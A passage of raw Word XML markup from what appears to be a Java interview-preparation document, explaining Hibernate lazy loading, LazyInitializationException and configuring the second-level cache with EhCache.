          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="572"/>
    </w:p>
    <w:p w14:paraId="4CB3B9D1" w14:textId="6CE542F6" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D02ACB"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helps in deferring the loading of related entities until they are explicitly accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506ABA0"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is can lead to performance optimization by reducing the number of database queries when the related data is not needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF2F8F5"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uses proxies or bytecode enhancement to implement lazy loading. A proxy is a placeholder object that will be replaced with the real entity when accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4345B50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Lazy Loading in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FC30F"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associations (One-to-One, One-to-Many, Many-to-One, Many-to-Many):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B02A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f you have an Order entity and each Order has a Customer associated with it (many-to-one relationship), the Customer will not be fetched from the database until you explicitly access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761158DE"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collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128B304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f an entity has a collection (like List, Set, etc.), the collection will not be loaded until you attempt to access it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C75EAC"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to enable Lazy Loading in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B87A846"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default, Hibernate uses lazy loading for most relationships unless configured otherwise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4F83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n your entity mapping, you can specify lazy loading using the fetch attribute of @ManyToOne, @OneToMany, @OneToOne, etc., annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7BB87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461DDD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39895FB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66290588" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC61264"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1FBC53F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6ED9860" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FB617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  // Lazy loading enabled here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6A363"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3E46FDA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47DF710" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7C034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43963B7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574366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e above example, the customer field will only be loaded when it is accessed for the first time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658A02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1105E18D"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load an Order entity, the associated Customer entity will not be loaded immediately from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA93B9"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stead, a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>proxy object</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is created, and when you try to access the customer field, the actual database query to load the Customer is triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF1EE36"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his ensures that the Customer data is loaded only when needed, not when the Order is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4C4477"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 and Cons of Lazy Loading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEB6192"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500AFDCC"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r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It reduces unnecessary database queries, especially when the associated entities are not always needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B75A31"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tter resource usage</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Saves memory and processing time since data is fetched only when required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250BF6E6"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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570B9B03" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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tential for LazyInitializationException</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the session is closed before the lazy-loaded data is accessed, a LazyInitializationException is thrown because Hibernate cannot load the data outside an active session context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346AA8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scenario where exception occurs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790951E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7598597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der order = session.get(Order.class, 1L);  // Lazy loading triggered later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AE2EB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 // Session is closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6543B4CA" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717BA92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This will throw LazyInitializationException since the session is closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301471F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ustomer customer = order.getCustomer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B63F64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avoid this, you can either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ECDA50"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eager loading</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (by setting fetch = FetchType.EAGER), which loads the associations immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D800FF1"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Open Session in View</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern, which keeps the session open until the view rendering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F08B6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Lazy Loading in Action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B21F6F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10C532C"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ustomer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DF992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0D0227C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26BDF91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10A5088" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C0556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neToMany(fetch = FetchType.LAZY, mappedBy = "customer")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649A6FF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Order&gt; orders;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C66579" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2F876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636A805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7C96D9C" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557EA66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76C2A81D"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24B8538D" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6A1B2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7A11D6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5AF10D7E" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9F934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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E127D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18C1328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6BB2D78" w14:textId="77777777" w:rsidR="00A3294D" w:rsidRPr="007F3379" w:rsidRDefault="00A3294D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CC2D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55016B4A"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27DD21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 the orders collection in Customer and the customer association in Order are both </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazily loaded</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2B9B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3DCC76A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465" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="552234E1" w14:textId="75575376" w:rsidR="00B62C20" w:rsidRPr="00CE4B95" w:rsidRDefault="00B911B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="573" w:name="_Toc197867787"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the second level cache in hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00B62C20" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="573"/>
    </w:p>
    <w:p w14:paraId="335E87F1" w14:textId="71CF769B" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7"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mechanism used to cache entities, collections, and queries across sessions within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Unlike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which is associated with a singl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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">and is automatically enabled,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s shared among all sessions that are created from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and needs to be explicitly configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C91FAB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 about Second-Level Cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A6DB8F"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The second-level cache is scoped to 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meaning all sessions created by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can access the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41DAD5"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via Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unlike the first-level cache, which is always enabled in Hibernate, the second-level cache must be explicitly configured by enabling it in the Hibernate configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62750E1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Providers</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Hibernate allows you to use different cache providers (such as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OSCache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.). You can choose the cache provider based on your application’s needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA9A99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trategies</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hibernate supports different caching strategies such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADB287E"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ing</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Caching of entity objects (e.g., Customer, Product).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AD5D8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ing</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Caching of collections (e.g., lists, sets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA430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ing</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Caching of the result of HQL or SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A8A4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xml:space="preserve">: The second-level cache uses </w:t>
      </w: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Each type of data (entities, collections, queries) can have a separate cache region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436E595"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Second-Level Cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79127CA3"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e</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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e</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This cache stores collections, i.e., relationships between entities (e.g., @OneToMany or @ManyToMany mappings). If a collection is requested, it is first checked in the cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D54E23E"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e</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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29E97F62"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oading</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When an entity is requested, Hibernate first checks if the entity is already available in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 cache). If not, it then checks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f enabled).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC8A731"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oring in Cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When an entity or collection is fetched from the database for the first time, Hibernate stores it in the second-level cache, where it remains available for subsequent sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C305C7"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w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Cache synchronization ensures that the cache is kept consistent with the database. For example, if an entity is modified, the cache needs to be updated to reflect those changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1815F39E"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uring Second-Level Cache in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2FAA4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enable the second-level cache in Hibernate, you need to perform the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A409E9" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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the Cache Provider</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in hibernate.cfg.xml or application properties file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581CF84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6A6C897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60E2686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Enable second-level cache --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB3C6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57D87210" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259CB05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provider (e.g., Ehcache) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072511D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provider_class"&gt;org.hibernate.cache.ehcache.EhCacheProvider&lt;/property&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3429DC44" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F3E5E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region factory --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC7E0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1E0AEB4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23F1174E"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317BF42" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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e Entities for Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hibernate entities can be marked with @Cache to indicate that they should be cached in the second-level cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7111427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ntity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2F698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WRITE) // Define caching strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF056F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0E44B29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C8456E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7C067BA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1FC3E961" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DCEB0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6B306B1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8A2B00"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Cache Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can configure different cache strategies using annotations or in the configuration file. The most common strategies are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA07565"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ONLY</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The entity is never updated, and the cache is used only for reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC467BA"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WRITE</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The entity can be updated, and the cache is used for both reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CC21B7"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NSTRICT_READ_WRITE</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The entity is read from the cache, but concurrent writes might not always be consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0336267A"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 Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Hibernate provides eviction strategies that determine when to evict cached data. You can manually control cache eviction or configure automatic eviction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6EC440"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with EhCache as Cache Provider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676BB25A" w14:textId="77777777" w:rsidR="003F76C7" w:rsidRPr="007F3379" w:rsidRDefault="003F76C7" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201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hCache Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ehcache.xml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A6152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6385D5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ache name="com.example.Product"</w:t>
      </w:r>
    </w:p>
